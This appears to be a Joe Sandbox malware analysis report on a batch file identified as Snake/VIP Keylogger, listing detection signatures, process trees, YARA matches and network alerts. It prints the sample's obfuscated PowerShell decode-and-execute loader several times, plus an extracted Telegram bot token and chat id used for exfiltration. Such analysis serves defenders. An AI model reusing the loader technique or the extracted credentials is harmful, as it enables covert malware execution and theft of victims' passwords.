Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA Since OCT DEC 241738316681530012900.bat

Overview

General Information

Sample name:SOA Since OCT DEC 241738316681530012900.bat
Analysis ID:1637169
MD5:091339b9b937b6193b28a92975e7d2ae
SHA1:a4f023b841cdf5942908c93d27f33a4fbb0ffb07
SHA256:85a8c769dc1066bc515c68796178c74677e8bfc7a6251688f9f3bccb275df2d0
Tags:176-65-144-116batuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Decrypt And Execute Base64 Data
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code contains very large strings
.NET source code references suspicious native API functions
Creates a thread in another existing process (thread injection)
Joe Sandbox ML detected suspicious sample
PowerShell case anomaly found
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Inline Execution From A File
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6680 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3820 cmdline: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 3888 cmdline: "C:\Windows\system32\taskkill.exe" /IM ping.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 5988 cmdline: "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 3612 cmdline: C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: B3624DD758CCECF93A1226CEF252CA12)
      • csc.exe (PID: 2680 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1592 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • svchost.exe (PID: 4040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat id": "2135869667"}
{"Exfil Mode": "Telegram", "Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat_id": "2135869667", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3327175771.0000000000770000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2cc8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x625e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d8a2:$a1: get_encryptedPassword
        • 0x2dbbf:$a2: get_encryptedUsername
        • 0x2d6b2:$a3: get_timePasswordChanged
        • 0x2d7bb:$a4: get_passwordField
        • 0x2d8b8:$a5: set_encryptedPassword
        • 0x2ef16:$a7: get_logins
        • 0x2ee79:$a10: KeyLoggerEventArgs
        • 0x2eade:$a11: KeyLoggerEventArgsEventHandler
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        8.2.PING.EXE.6900000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          8.2.PING.EXE.6900000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            8.2.PING.EXE.6900000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              8.2.PING.EXE.6900000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2d8a2:$a1: get_encryptedPassword
              • 0x2dbbf:$a2: get_encryptedUsername
              • 0x2d6b2:$a3: get_timePasswordChanged
              • 0x2d7bb:$a4: get_passwordField
              • 0x2d8b8:$a5: set_encryptedPassword
              • 0x2ef16:$a7: get_logins
              • 0x2ee79:$a10: KeyLoggerEventArgs
              • 0x2eade:$a11: KeyLoggerEventArgsEventHandler
              8.2.PING.EXE.6900000.1.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x3b60f:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x3acb2:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x3af0f:$a4: \Orbitum\User Data\Default\Login Data
              • 0x3b8ee:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 7 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_3820.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", ProcessId: 2680, ProcessName: csc.exe
                Source: Process startedAuthor: frack113: Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3820, TargetFilename: C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4040, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", ProcessId: 2680, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T11:42:31.054362+010028033053Unknown Traffic192.168.2.849685104.21.32.1443TCP
                2025-03-13T11:42:35.338531+010028033053Unknown Traffic192.168.2.849691104.21.32.1443TCP
                2025-03-13T11:42:44.573491+010028033053Unknown Traffic192.168.2.858063104.21.32.1443TCP
                2025-03-13T11:42:47.641724+010028033053Unknown Traffic192.168.2.858067104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T11:42:24.594100+010028032742Potentially Bad Traffic192.168.2.849682132.226.8.16980TCP
                2025-03-13T11:42:29.031647+010028032742Potentially Bad Traffic192.168.2.849682132.226.8.16980TCP
                2025-03-13T11:42:33.281665+010028032742Potentially Bad Traffic192.168.2.849688132.226.8.16980TCP
                2025-03-13T11:42:36.516020+010028032742Potentially Bad Traffic192.168.2.858058132.226.8.16980TCP
                2025-03-13T11:42:39.500531+010028032742Potentially Bad Traffic192.168.2.858060132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T11:42:56.981507+010018100071Potentially Bad Traffic192.168.2.858075149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SOA Since OCT DEC 241738316681530012900.batAvira: detected
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat id": "2135869667"}
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat_id": "2135869667", "Version": "4.4"}
                Source: SOA Since OCT DEC 241738316681530012900.batReversingLabs: Detection: 31%
                Source: SOA Since OCT DEC 241738316681530012900.batVirustotal: Detection: 45%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 8.2.PING.EXE.6900000.1.raw.unpackString decryptor: 8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI
                Source: 8.2.PING.EXE.6900000.1.raw.unpackString decryptor: 2135869667
